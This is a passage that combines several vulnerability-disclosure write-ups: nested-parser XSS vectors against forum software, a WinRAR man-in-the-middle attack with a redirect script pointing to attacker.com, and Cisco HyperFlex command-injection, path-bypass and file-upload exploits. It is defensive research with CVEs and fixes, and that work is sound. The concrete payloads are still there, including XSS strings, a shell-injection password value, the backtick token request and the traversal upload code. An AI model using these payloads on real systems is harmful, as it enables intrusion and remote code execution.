    $input = preg_replace('/(http|https|files):\/\/[^\s]*/', '<a href="${0}">${0}</a>', $input);
    $input = preg_replace('/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)(\?\w*=[^\s]*|)/', '<a href="mailto:${0}">${0}</a>', $input);
    $input = preg_replace('/\n/', '<br>', $input);
    return $input . "\n\n";
}
$message = returnCLickable(htmlspecialchars($_REQUEST['msg']));
?>



User input is passed as sanitized text to the returnCLickable function, which finds URLs and emails and returns HTML code for clickable elements.

It looks safe at first, but if you send a string that contains an email inside a URL, the parser returns broken HTML code, and your user input migrates from an HTML attribute value into an HTML attribute name.
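The same nested-parser flaw can be re-created in a few lines of Python (a simplified model of the PHP code above):

```python
import re

def return_clickable(text):
    # First pass: linkify URLs
    text = re.sub(r'(https?://\S*)', r'<a href="\g<0>">\g<0></a>', text)
    # Second pass: linkify e-mails, unaware of the HTML produced above
    text = re.sub(r'([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)',
                  r'<a href="mailto:\g<0>">\g<0></a>', text)
    return text

# An e-mail inside the URL gets rewritten while it sits inside the
# href attribute, so the generated markup breaks out of the attribute
print(return_clickable("http://user@example.com/"))
```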

## Fuzzlist building logic

For a better understanding, here is an example with vBulletin. Below is a fuzz-list fragment used to discover XSS via nested parsers. The vulnerable BBCode tag is [video], and the tag that allows us to insert new HTML attributes is [font]:

[img]http://aaa.ru/img/header.jpg[font=qwe]qwe[/font]qwe[/img]
[VIDEO="qwe[font=qwe]qwe[/font];123"]qwe[/VIDEO]
[VIDEO="qwe;123"]qw[font=qwe]qwe[/font]e[/VIDEO]
[video=twitch;123]https://www.twitch.tv/videos/285048327?collection=-41EjFuwRRWdeQ[font=qwe]qwe[/font][/video]
[video=vimeo;123]https://vimeo.com/channels/staffpicks/285359780[font=qwe]qwe[/font][/video]
[video=metacafe;123]http://www.metacafe.com/watch/11718542/you-got-those-red-buns-hun/[font=qwe]qwe[/font][/video]
[video=liveleak;123]https://www.liveleak.com/view?i=715_1513068362[font=qwe]qwe[/font][/video]
[video=dailymotion;123]https://www.dailymotion.com/video/x6hx1c8[font=qwe]qwe[/font][/video]
[FONT=Ari[font=qwe]qwe[/font]al]qwe[/FONT]
[SIZE=11[font=qwe]qwe[/font]px]qwe[/SIZE]
[FONT="Ari[font=qwe]qwe[/font]al"]qwe[/FONT]
[SIZE="11[font=qwe]qwe[/font]px"]qwe[/SIZE]
[email][email protected][font=qwe]qwe[/font]e.com[/email]
[[email protected][font=qwe]qwe[/font]e.com]qwe[/email]
[url]http://[email protected][font=qwe]qwe[/font]e.com[/url]
[url=http://[email protected][font=qwe]qwe[/font]e.com]qwe[/url]
[email="[email protected][font=qwe]qwe[/font]e.com"]qwe[/email]
[url="http://[email protected][font=qwe]qwe[/font]e.com"]qwe[/url]


### Step 1

Enumerate all the strings that can be converted into HTML code and save them to List B:

http://google.com/?param=value
[color=colorname]text[/color]
[b]text[/b]
:smile:


### Step 2

Save the lines that allow passing arguments in HTML to List A as insertion points, and mark where the payloads from List B will be inserted. You can also use List C to check HTML character sanitization, Unicode support, or 1-byte fuzzing:

http://google.com/?param=va%listC%%listB%lue
[color=color%listC%%listB%name]text[/color]


### Step 3

Generate the fuzz-list using Lists A, B and C:

http://google.com/?param=va<[color=colorname]text[/color]lue
[color=color<:smile:name]text[/color]
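The three steps above boil down to a Cartesian product of the lists:

```python
# List A: insertion points with %listB%/%listC% markers
list_a = [
    "http://google.com/?param=va%listC%%listB%lue",
    "[color=color%listC%%listB%name]text[/color]",
]
# List B: strings the parser converts to HTML
list_b = ["[color=colorname]text[/color]", ":smile:"]
# List C: probe characters for sanitization checks
list_c = ["<", '"', "'"]

fuzz_list = [a.replace("%listC%", c).replace("%listB%", b)
             for a in list_a for b in list_b for c in list_c]

print(len(fuzz_list))  # 12 test cases
```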


## Detection of anomalies

### Method 1 – visual

You can use this method on desktop/mobile apps when you can’t see HTTP traffic or HTML source of returned messages.

Expected results: chunks of HTML code (">, " >, "/>) become visible.

### Method 2 – regular expressions

This method can be used when you apply fully automated fuzzing.

For example, we use a regex that searches for an opening HTML tag character < inside an HTML attribute:

We applied this fuzzing technique against the vBulletin board using BurpSuite Intruder. We sorted the resulting table by the seventh column that contains the true/false condition of the used regex. At the bottom of the screenshot, you can see the HTML source of the successful test case, with the substring found and highlighted by our regex rule:
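A rule of that shape can be expressed like this (our own sketch; the original regex is shown only in the screenshot):

```python
import re

# Flag responses where a quoted attribute value still contains a raw "<"
anomaly = re.compile(r'=\s*"[^"]*<')

clean = '<a href="http://example.com/">link</a>'
broken = '<a href="http://a<span style="font-family:a onmouseover=alert(1)">'

assert anomaly.search(clean) is None
assert anomaly.search(broken) is not None
```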

## Discovered vulnerabilities

This is not the full list: some vendors have not patched yet, and some findings we cannot disclose…

### vBulletin < 5.6.4 PL1, 5.6.3 PL1, 5.6.2 PL2

CVE: not assigned

XSS vector (video BBcode + font BBcode):

[VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]

HTML output:

<a class="video-frame h-disabled" href="a<span style="font-family:a onmouseover=alert(location) a">a</span>a" data-vcode="000" data-vprovider="aaa">

### MyBB

CVE: CVE-2021-27279.

XSS vector (email BBcode + email BBcode with another syntax):

[email][email protected]?[[email protected]? onmouseover=alert(1) a]a[/email][/email]

HTML output:

<a href="mailto:[email protected]?<a href="mailto:[email protected]? onmouseover=alert(1) a" class="mycode_email">a" class="mycode_email">[email protected]?[[email protected]? onmouseover=alert(1) a]a</a></a>

### PMWiki

CVE: CVE-2021-29231

XSS vector (div title wikitext + font-family wikitext):

%define=aa font-family='a="a'%

test


HTML output:

<div title='a<span  style='font-family: a="a;'> a' style='a' >"onmouseover="alert(1)"</span> <p>test

### Rocket.Chat

CVE: CVE-2021-22886

XSS vector (url parser + markdown url):

[ ](http://www.google.com)


HTML output:

<a href="http://www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a" target="_blank" rel="noopener noreferrer">www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a</a>

### XMB

CVE: CVE-2021-29399

XSS vector (URL BBcode + URL BBcode another syntax):

[url]http://a[url=http://onmouseover=alert(1)// a]a[/url][/url]

HTML output:

<a href='http://a<a href='http://onmouseover=alert(1)// a' onclick='window.open(this.href); return false;'>a' onclick='window.open(this.href); return false;'>http://a[url=http://onmouseover=alert(1)// a]a</a></a>

### SCEditor < 3 / SMF 2.1 – 2.1 RC3

CVE: not assigned

XSS vector (BBcode + BBcode):

[email][email protected][size="onfocus=alert(1) contenteditable tabindex=0 id=xss q"]a[/email].a[/size]

HTML output:

<a href="mailto:[email protected]<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font>">[email protected]<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font></a><font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">.a</font>

### PunBB

CVE: CVE-2021-28968

XSS vector (email BBcode + url BBcode inside b BBcode):

[email][email protected][b][url]http://onmouseover=alert(1)//[/url][/b]a[/email]

HTML output:

<a href="mailto:[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a">[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a</a>

### Vanilla forums

CVE: not assigned

XSS vector (HTML <img alt> + HTML <img>):

<img alt="<img onerror=alert(1)//"<"> 

HTML output:

img alt="<img onerror=alert(1)//" src="src" />

## Recommendations for elimination

Based on our findings, we can say that one of the best sanitization options, one that protects even parsers with nesting conditions, is the complete encoding of user input to HTML entities:
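As a minimal sketch of this recommendation, Python's standard `html.escape` performs exactly this kind of entity encoding (the patched CMSes each use their own encoder, so this is an illustration, not their code):

```python
import html

def sanitize(user_input: str) -> str:
    # Encode &, <, >, " and ' to HTML entities before the input reaches
    # tag or attribute context in the parser output.
    return html.escape(user_input, quote=True)

print(sanitize('a" onmouseover=alert(1) a'))  # prints: a&quot; onmouseover=alert(1) a
```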

For example, let us look at the Phorum CMS that has already been patched.

In the latest version of this CMS, one of the BBcodes encodes all user input to HTML entities, whereas the same input triggers an XSS when reproduced on previous versions. This patch is a great example:

my e-mail: [email][email protected][/email]

# WinRAR’s vulnerable trialware: when free software isn’t free

20 October 2021 at 14:01

In this article we discuss a vulnerability in the trial version of WinRAR which has significant consequences for the management of third-party software. The vulnerability allows an attacker to intercept and modify requests sent to the user of the application, which can be used to achieve remote code execution (RCE) on a victim’s computer. It has been assigned CVE-2021-35052.

## Background

WinRAR is an application for managing archive files on Windows operating systems. It allows for the creation and unpacking of common archive formats such as RAR and ZIP. It is distributed as trialware, allowing a user to experience the full features of the application for a set number of days, after which the user may continue to use the application with some features disabled.

## Findings

We found this vulnerability by chance, in WinRAR version 5.70. We had installed and used the application for some time when it produced a JavaScript error:

This was surprising as the error indicates that the Internet Explorer engine is rendering this error window.

After a few experiments, it became clear that once the trial period has expired, roughly one in three launches of the WinRAR.exe application results in this notification window being shown. The window is rendered via the mshtml.dll implementation for Borland C++, the framework in which WinRAR is written.


We set up Burp Suite as the default Windows proxy and tried to intercept traffic, to understand more about why this was happening and whether it would be possible to exploit this error. As the request is sent via HTTPS, the user of WinRAR will get a notification about the insecure self-signed certificate that Burp uses. However, in our experience, many users click “Yes” to proceed and use the application.

Looking at the request itself, we can see the version (5.7.0) and architecture (x64) of the WinRAR application:

GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com
Connection: close


### Modifying Responses to The End User

Next, we attempted to modify the responses WinRAR shows to the user. Instead of intercepting the default domain “notifier.rarlab.com” and replacing each response with our malicious content, we noticed that if the response code is changed to “301 Moved Permanently”, the redirection to our malicious domain “attacker.com” is cached and all subsequent requests go to “attacker.com”.

HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close
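A responder serving this poisoned reply can be sketched in a few lines of Python, assuming traffic to notifier.rarlab.com is already being routed to it (for example via ARP spoofing) and that “attacker.com” stands in for the attacker’s host:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class Redirector(BaseHTTPRequestHandler):
    """Answer every GET with a permanent redirect to the attacker host."""
    def do_GET(self):
        self.send_response(301)  # 301 is cached, so later requests skip us
        self.send_header("Location", "http://attacker.com" + self.path)
        self.send_header("Content-Length", "0")
        self.end_headers()

def make_server(port: int = 80) -> HTTPServer:
    return HTTPServer(("0.0.0.0", port), Redirector)

# make_server().serve_forever()  # run from the MitM position
```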


### Remote Code Execution

This man-in-the-middle attack requires ARP spoofing, so we presume that a potential attacker already has access to the same network domain. This puts us into Zone 1 of the IE security zones. We attempted several different attack vectors to see what is feasible with this kind of access.

<a href="file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\\10.0.12.34/applications/test.jar">\\10.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>


The code above depicts the spoofed response showing several possible attack vectors such as running applications, retrieving local host information, and running the calculator application.

Most of the attack vectors were successful, but it should be noted that many result in an additional Windows security warning. For these to succeed, the user would need to click “Run” instead of “Cancel”.

However, there are some file types that can be run without the security warning appearing. These are:

• .DOCX
• .PDF
• .PY
• .RAR

Remote code execution is possible with RAR files against WinRAR versions earlier than 5.7, via the well-known exploit for CVE-2018-20250.

## Conclusion

One of the biggest challenges an organization faces is the management of third-party software. Once installed, third-party software has access to read, write, and modify data on devices which access corporate networks. It’s impossible to audit every application that could be installed by a user and so policy is critical to managing the risk associated with external applications and balancing this risk against the business need for a variety of applications. Improper management can have wide reaching consequences.

# Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings

29 September 2021 at 13:57

In February 2021, we had the opportunity to assess the HyperFlex HX platform from Cisco during a routine customer engagement. This resulted in the detection of three significant vulnerabilities. In this article we discuss our findings and will explain why they exist in the platform, how they can be exploited and the significance of these vulnerabilities.

The vulnerabilities discussed have been assigned CVE IDs and are covered in Cisco’s subsequent security advisories. These are:

• CVE-2021-1497
Cisco HyperFlex HX Installer Virtual Machine Command Injection Vulnerability (CVSS Base Score: 9.8);
• CVE-2021-1498
Cisco HyperFlex HX Data Platform Command Injection Vulnerability (CVSS Base Score: 7.3);
• CVE-2021-1499
Cisco HyperFlex HX Data Platform File Upload Vulnerability (CVSS Base Score: 5.3)

## Background

Cisco HyperFlex HX is a set of systems that combine various network and computing resources into a single platform. One of the key features of the Cisco HyperFlex HX Data Platform (software-defined storage) is that it allows the end user to work with various storage devices and virtualize all elements and processes. This allows the user to easily back up, allocate or clone resources. This concept is called Hyperconverged Infrastructure (HCI). You can read more about this on the Cisco website under “Hyperconverged Infrastructure (HCI): HyperFlex” and “Cisco HyperFlex HX-Series”.

Cisco HyperFlex HX comes with a web interface, which allows for easy configuration. The version we tested is the Cisco HyperFlex HX Data Platform v4.5.1a-39020. This can be seen below:

The HyperFlex platform is deployed as an image on the Ubuntu operating system. Our initial inspection showed that nginx 1.8.1 is used as the front-end web server. Knowing this, we decided to look at the nginx configuration files to see what else we could learn. The nginx configuration for the “springpath” project is located in the /usr/share/springpath/storfs-misc/ directory. Springpath developed a distributed file system for hyperconvergence, and Cisco acquired the company in 2017.

Our priority was to gain access to system management without any authentication, so we carried out a detailed examination of each route (location) in the configuration file. This thorough investigation allowed us to prioritize areas for further research that might let us do so.

## Findings

### CVE-2021-1497: RCE through the password input field

Authentication is the process of verifying that a user is who they say they are. This process is frequently achieved by passing a username and a password to the application. Authorization is the process of granting access or denying access to a particular resource. Authentication and authorization are closely linked processes which determine who and what can be accessed by a user or application.

During our testing we noted that the process of authentication is handled by a third-party service. This is shown in the configuration file below:

By looking at the content of this configuration section, you can see that the authentication process is handled by the binary file /opt/springpath/auth/auth. This service is a 64-bit ELF application, and we noted that its size is larger than that of standard applications. This could indicate a large amount of debugging information in the binary or a big compiled Golang project. The latter was quickly confirmed after reading the section headers with the readelf command.

The auth binary handles several URL requests:

• /auth
• /auth/change
• /auth/logout
• /auth/verify
• /auth/sessionInfo

Most of these requests do not take user input; however, the URLs /auth and /auth/change allow user input through the parameters username, password and newPassword. The /auth page handles authentication. When a user enters their username and password, the HTTP request is sent as follows:

Analysis of the authentication application showed that the credentials are retrieved in the main_loginHandler function through the standard function net/http.(*Request).ParseForm. Next, the login and password are passed to the main_validateLogin function. This function retrieves the value from the username parameter and the corresponding user hash from the /etc/shadow file. If the user exists, a further check of the entered password is executed through the main_validatePassword function, using the main_checkHash function.

The hash value is calculated by calling a one-line Python script via os/exec.Command:

python -c "import crypt; print(crypt.crypt(\"OUR_PASS\", \"$6$$\"));"

Then the resulting hash value is extracted and compared with the value from /etc/shadow. The big problem with this method of executing commands from Python is that it allows for command injection: there is no input validation, and any user input is passed to os/exec.Command exactly as it was entered. Additionally, commands are executed with the privileges of the application, in this case root. It is therefore trivial to execute system commands with malicious intent. For example, we entered the following into the password field, causing a reboot of the system:

123", "$6$$"));import os;os.system("reboot");print(crypt.crypt("

This vulnerability allows a malicious user to call a remote reverse shell with root privileges using only one HTTP request.

The other URL that handles user input, /auth/change, also presents a way to execute arbitrary code. The password change is handled by the main_changeHandler function, which works in much the same way as the login process at /auth. The existence of the user is checked using the same process, and the password hash is calculated using the same function, main_checkHash. In the value of the new password, newPassword, we were able to pass the same input, causing a system reboot:

123", "$6$$"));import os;os.system("reboot");print(crypt.crypt("

We found two ways to trigger remote execution of arbitrary code, using the /auth and /auth/change endpoints. However, as both the password and newPassword parameters use the same function, main_checkHash, to execute external commands, the vendor issued only one CVE. A more secure way to execute external commands in Python is to use the subprocess module and to validate the arguments taken from user input before execution.
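The contrast can be sketched in Python (the function names and the rejected-character check are illustrative; the real handler is Go code shelling out to Python):

```python
# Vulnerable shape: the password is spliced into a shell-parsed one-liner,
# so a crafted value closes the string and appends its own statements.
def vulnerable_cmd(password: str) -> str:
    return ('python -c "import crypt; '
            f'print(crypt.crypt(\\"{password}\\", \\"$6$$\\"));"')

# Safer shape: no shell, the password travels as its own argv element,
# with an illustrative character check before execution.
def safer_argv(password: str) -> list[str]:
    if any(ch in password for ch in '"\\$`;'):
        raise ValueError("password contains rejected characters")
    return ["python", "-c",
            "import crypt, sys; print(crypt.crypt(sys.argv[1], '$6$$'))",
            password]
```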

### CVE-2021-1498: Cisco HyperFlex HX Data Platform Command Injection Vulnerability

We analyzed the nginx configuration file and noticed that the /storfs-asup endpoint redirects all requests to the local Apache Tomcat server at TCP port 8000.

We then looked at the Apache Tomcat configuration file, web.xml, where we found:

From this file it is clear that the /storfs-asup URL is processed by the StorfsAsup class, located at /var/lib/tomcat8/webapps/ROOT/WEB-INF/classes/com/storvisor/sysmgmt/service/StorfsAsup.class.

public class StorfsAsup extends HttpServlet {
...
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String action = request.getParameter("action");
if (action == null) {
String msg = "Action for the servlet need be specified.";
writeErrorResponse(response, msg);
return;
}
try {
String token = request.getParameter("token");
StringBuilder cmd = new StringBuilder();
cmd.append("exec /bin/storfs-asup ");
cmd.append(token);
String mode = request.getParameter("mode");
cmd.append("  ");
cmd.append(mode);
cmd.append("  > /dev/null");
logger.info("storfs-asup cmd to run : " + cmd);
ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
logger.info("Starting the storfs-asup now: ");
long startTime = System.currentTimeMillis();
Process p = pb.start();
...
}
...
}
}

When analyzing this class, we noticed that the parameters received from the user are not filtered or validated in any way. They are appended to a string which is subsequently executed as an operating system command. Based on this, we can form a malicious GET request that will be executed as an OS command.

GET /storfs-asup/?action=asd&token=%60[any_OS_command]%60 HTTP/1.1
Host: 192.168.31.76
Connection: close



This results in the execution of arbitrary commands on the server from an unauthenticated user.

It is worth noting that the web path /storfs-asup is only available if port 80 is accessible externally. To exploit the vulnerability through port 443, the request needs to be modified to use the path /crossdomain.xml/..;/storfs-asup/. This works because the nginx configuration file specifies that all requests starting with /crossdomain.xml are proxied to Tomcat, and using the well-known Tomcat directory traversal technique “..;/”, we can access any servlet on the Tomcat web server.
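A hypothetical helper that assembles the port-443 bypass request path (the backtick command substitution matches the GET request shown earlier):

```python
import urllib.parse

# Build the bypass path: the "/crossdomain.xml" prefix matches the proxied
# nginx location, and Tomcat collapses "..;/" back to the servlet root.
def bypass_path(command: str) -> str:
    token = urllib.parse.quote(f"`{command}`")  # backticks = shell substitution
    return f"/crossdomain.xml/..;/storfs-asup/?action=asd&token={token}"

print(bypass_path("id"))
# prints: /crossdomain.xml/..;/storfs-asup/?action=asd&token=%60id%60
```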

### CVE-2021-1499: Cisco HyperFlex HX Data Platform File Upload Vulnerability

Closer inspection of the nginx configuration file showed us the following location for file uploads:

No authorization is required to request this URL, and the path is accessible externally. It is set up in a similar way to CVE-2021-1498: requests are proxied to the application listening on port 8000 for incoming connections.

As an experiment, we sent a multipart request for directory traversal and it was accepted.

As a result, the file with the name passwd9 was created for the user “tomcat8” in the specified directory:
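Such a request can be sketched by hand-building the multipart body; the field name and target path here are assumptions for illustration:

```python
import uuid

def traversal_upload_body(filename: str, data: bytes) -> tuple[bytes, str]:
    """Build a multipart/form-data body whose filename field walks out of
    the intended upload directory via "../" sequences."""
    boundary = uuid.uuid4().hex
    part = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="file"; '
            f'filename="{filename}"\r\n'
            f"Content-Type: application/octet-stream\r\n\r\n").encode()
    return part + data + f"\r\n--{boundary}--\r\n".encode(), boundary

body, boundary = traversal_upload_body("../../../../tmp/passwd9", b"test")
```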

The complete lack of authentication means that we are able to upload arbitrary files to any location on the file system with “tomcat8” user privileges. This is a significant oversight on the developers’ part.

During the process of publishing this paper, we gained a broader understanding of the vulnerability, allowing us to execute arbitrary code. The vulnerability seems a lot less harmless now than it did before. The details are available at the following link.

### Not every mistake is a mistake

The default route in the nginx configuration file also caught our attention. This route handles all HTTP requests that do not match any of the other rules described in the configuration file. These requests are redirected to port 8002, which is only available internally.

As with the auth binary, this route is handled by the installer, a 64-bit ELF application that is also a compiled Golang project.

This application handles the /api/* requests. To work with the API interface, it is necessary to have an authorization token. The installer binary handles the following endpoints:

• /api/run
• /api/orgs
• /api/poll
• /api/about
• /api/proxy
• /api/reset
• /api/config
• /api/fields
• /api/upload
• /api/restart
• /api/servers
• /api/query_hfp
• /api/hypervisor
• /api/datacenters
• /api/logOnServer
• /api/add_ip_block
• /api/job/{job_id}
• /api/tech_support
• /api/write_config
• /api/validate_ucsm
• /api/update_catalog
• /api/upload_catalog
• /api/validate_login

Though the initial goal of this research was to find vulnerabilities that require no prerequisites or authentication, this finding requires a user to be logged into the Cisco HyperFlex web interface. We analyzed the endpoint handlers and found two requests that work with the file system. The /api/update_catalog and /api/upload routes allowed us to upload arbitrary files to a specific directory. The handlers responsible for working with the uploaded data are main_uploadCatalogHandler and main_uploadHandler.

In the first case, the transferred files are written to the /opt/springpath/packages/ directory. Using a simple path traversal attack, we were able to write a file outside of this directory, to an arbitrary location on the system.

As a result, we are able to write files anywhere on the system, as these requests are made with root privileges.

The second request causes a file to be written to the /var/www/localhost/images/ directory from the web interface. This works in a similar way to the previous request: by changing the file name in an HTTP multipart POST request, a malicious user can create a file anywhere on the file system.

Cisco does not consider these to be vulnerabilities, reasoning that if an attacker knows customer credentials, it would already be possible to log in via the enabled SSH server. However, we still consider this code to be poorly implemented.

## Conclusion

This research project started as an opportunity during a routine customer engagement, and it resulted in three significant vulnerabilities. These vulnerabilities are the result of a lack of input validation, improper management of authentication and authorization, and reliance on third-party code. They can be mitigated by following secure coding best practices and ensuring that security testing is an integral part of the development process.

Command injection vulnerabilities remain a significant issue in the industry, despite the development of best practices such as the SSDLC (Secure Software Development Lifecycle). This could be addressed in two parts: first, if there is appetite in the industry to make best practices a requirement through standards; second, if external testing is implemented to assess whether those standards are adhered to.

Finally, it should be noted that third-party products often do not meet the same rigorous security standards as existing product lines. The acquisition and integration of third-party products is a difficult path to manage. Every acquisition should involve a thorough review of coding practices and security testing; in some cases, products may benefit from a complete overhaul to ensure that data is handled consistently between components and in a secure manner.